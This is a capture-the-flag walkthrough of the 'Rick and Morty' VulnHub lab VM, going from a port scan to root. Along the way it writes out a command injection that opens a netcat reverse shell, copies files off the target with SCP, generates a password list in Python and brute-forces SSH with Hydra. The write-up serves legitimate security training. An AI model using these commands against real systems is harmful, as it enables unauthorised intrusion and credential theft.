A new Boot2Root came online on VulnHub and it looked like fun.  This one is themed around a cartoon show called “Rick and Morty”.

First order of business for me is to run an Nmap scan. I like to do a full TCP port scan with service enumeration.

root@kali:~# nmap -Pn -p- -sV

Starting Nmap 7.25SVN ( https://nmap.org ) at 2017-10-16 13:52 EDT
Nmap scan report for
Host is up (0.00022s latency).
Not shown: 65528 closed ports
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh?
80/tcp open http Apache httpd 2.4.27 ((Fedora))
9090/tcp open http Cockpit web service
13337/tcp open unknown
22222/tcp open ssh OpenSSH 7.5 (protocol 2.0)
60000/tcp open unknown

Before hitting the well known ports, I will inspect the interesting ones.  Port 9090 is identified within the VM as being the management interface.  From there I connected via HTTPS and get the first flag:

FLAG {There is no Zeus, in your face!} – 10 points

Connecting to port 13337 with netcat reveals yet another flag:

root@kali:~# nc 13337


Connecting to port 60000 gave me a sort of “fake” shell to play around with.  I saw there is a file named FLAG.txt so reading that file gave me the flag.

root@kali:~# nc 60000
Welcome to Ricks half baked reverse shell...
# ls
# cat FLAG.txt

FLAG{Flip the pickle Morty!} – 10 Points

Running Nmap with scripts (-sC flag) shows that FTP is unauthenticated. I connected to it with within my web browser.

There was a flag file inside to download:

FLAG{Whoa this is unexpected} – 10 Points

Moving on now to the main web app, I reviewed the source code, but there isn’t much to look at. Running any spider application or just going to the common “robots.txt” file in the web root reveals this:

They're Robots Morty! It's ok to shoot them! They're just Robots!


Root_shell.cgi is a troll, but tracertool.cgi is pretty interesting.  It is a web application that performs traceroute on a given IP.  As an obvious canidate for command injection, I inserted a semi-colon to run a seperate command.  I used netcat to send myself a reverse shell:; nc -e /bin/sh 4444

After getting a shell I started poking around.  Looking in the html directory I saw a passwords folder.

cd ..
cd html
ls -lah
total 536K
drwxr-xr-x. 3 root root 76 Aug 22 03:36 .
drwxr-xr-x. 4 root root 33 Aug 22 02:27 ..
-rw-r--r--. 1 root root 326 Aug 22 01:58 index.html
-rw-r--r--. 1 root root 528K Aug 22 01:50 morty.png
drwxr-xr-x. 2 root root 44 Aug 23 19:51 passwords
-rw-r--r--. 1 root root 126 Aug 22 03:36 robots.txt

Hitting this in the web browser to reveals the FLAG.txt.

FLAG{Yeah d- just don’t do it.} – 10 Points

Also worth note is the passwords.html file.  Looking at it doesn’t tell much, but if when I viewed the source, I saw a password hidden in the HTML comments.

<!DOCTYPE html> <html> 
<title>Morty's Website</title> 
<body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.
<!--Password: winter--> 
</head> </html> 

At this point I came to find that the “cat” command was aliased to some command that just printed a picture of a cat.  To read files still, I just used grep command that would pretty much match on anything:

grep '[a-zA-Z0-9]' /etc/passwd

Running this command I could see all the users on the system.

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
systemd-coredump:x:999:998:systemd Core Dumper:/:/sbin/nologin
systemd-timesync:x:998:997:systemd Time Synchronization:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:997:996:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
cockpit-ws:x:996:994:User for cockpit-ws:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin

Knowing the password I found was “winter”, I figured this belonged to Summer.  Port 22222 was running OpenSSH so I used that to connect with the “Summer” user account.

root@kali:~# ssh Summer@ -p 22222

Once logged in as Summer, I saw another FLAG.txt waiting for me.

[Summer@localhost ~]$ ls -lah
total 20K
drwx------. 2 Summer Summer 99 Sep 15 11:49 .
drwxr-xr-x. 5 root root 52 Aug 18 18:20 ..
-rw-------. 1 Summer Summer 1 Sep 15 11:51 .bash_history
-rw-r--r--. 1 Summer Summer 18 May 30 14:53 .bash_logout
-rw-r--r--. 1 Summer Summer 193 May 30 14:53 .bash_profile
-rw-r--r--. 1 Summer Summer 231 May 30 14:53 .bashrc
-rw-rw-r--. 1 Summer Summer 48 Aug 22 02:46 FLAG.txt
[Summer@localhost ~]$ grep '[a-zA-Z0-9]' FLAG.txt

FLAG{Get off the high road Summer!} – 10 Points

Summer also had read access on some other user’s home directories.

[Summer@localhost home]$ ls -lah
total 0
drwxr-xr-x. 5 root root 52 Aug 18 18:20 .
dr-xr-xr-x. 17 root root 236 Aug 18 19:16 ..
drwxr-xr-x. 2 Morty Morty 131 Sep 15 11:49 Morty
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 10:30 RickSanchez
drwx------. 2 Summer Summer 99 Sep 15 11:49 Summer

Morty had several interesting files in his home directory.  I exfiled them off with SCP.

root@kali:~# scp -P 22222 summer@ .

Safe_Password.jpg was an image file, but viewing the EXIF data or simply running strings on the file shows that a password is contained inside.

root@kali:~# strings Safe_Password.jpg
8 The Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek

I also pulled down the journal.txt.zip file.

root@kali:~# scp -P 22222 Summer@ .

Unzipping the file and supplying the password gave me the journal.txt file:

root@kali:~# unzip journal.txt.zip
Archive: journal.txt.zip
[journal.txt.zip] journal.txt password:
inflating: journal.txt

Reading this file gave me the next flag, and a password.

root@kali:~# cat journal.txt
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe?

Anyway. Here it is:

FLAG: {131333} – 20 Points

When looking in Rick’s home folder, I could see his safe.

[Summer@localhost RICKS_SAFE]$ ls -lah
total 12K
drwxr-xr-x. 2 RickSanchez RickSanchez 18 Sep 21 09:50 .
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 10:30 ..
-rwxr--r--. 1 RickSanchez RickSanchez 8.5K Sep 21 10:24 safe

Summer does not have execute permissions on the “safe” file and does not own it, but she does have read permissions.  I copied it to gain control.

[Summer@localhost RICKS_SAFE]$ cp safe /tmp/safe

Running the binary and supplying the password file gave me the next flag.

Summer@localhost tmp]$ ./safe 131333

FLAG{And Awwwaaaaayyyy we Go!} – 20 Points

Ricks password hints:
(This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order

1 uppercase character
1 digit
One of the words in my old bands name.� @

I was  also given a password hint for Rick’s password.  I don’t watch the TV show, but a quick Google search found that the band name was “The Flesh Curtains”.

I worte a simple python script to create all the different possible passwords given the constraints:

from string import ascii_uppercase
for c in ascii_uppercase:
    for x in range(0, 10):
        print str(c) + str(x) + "Flesh"
        print str(c) + str(x) + "Curtains"

After running this script an saving the output to a file, I used THC Hydra to brute force SSH.

hydra -s 22222 -v -V -l RickSanchez -P [PASSWORD FILE] -t 16 ssh
[22222][ssh] host: login: RickSanchez password: P7Curtains

Once I found the valid password, I connected to Rick’s account.

root@kali:~# ssh RickSanchez@ -p 22222

I ran sudo -l to enumerate his permissions:

[RickSanchez@localhost ~]$ sudo -l
[sudo] password for RickSanchez:
Matching Defaults entries for RickSanchez on localhost:
LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User RickSanchez may run the following commands on localhost:

Rick had sudo permissions for ALL commands, so I just popped into an interactive root shell:

[RickSanchez@localhost ~]$ sudo -i

In the /root/ directory, there was another FLAG.txt.

[root@localhost ~]# grep '[a-zA-Z0-9]' FLAG.txt

FLAG: {Ionic Defibrillator} – 30 points

At this point I was root and had collected all 130 points.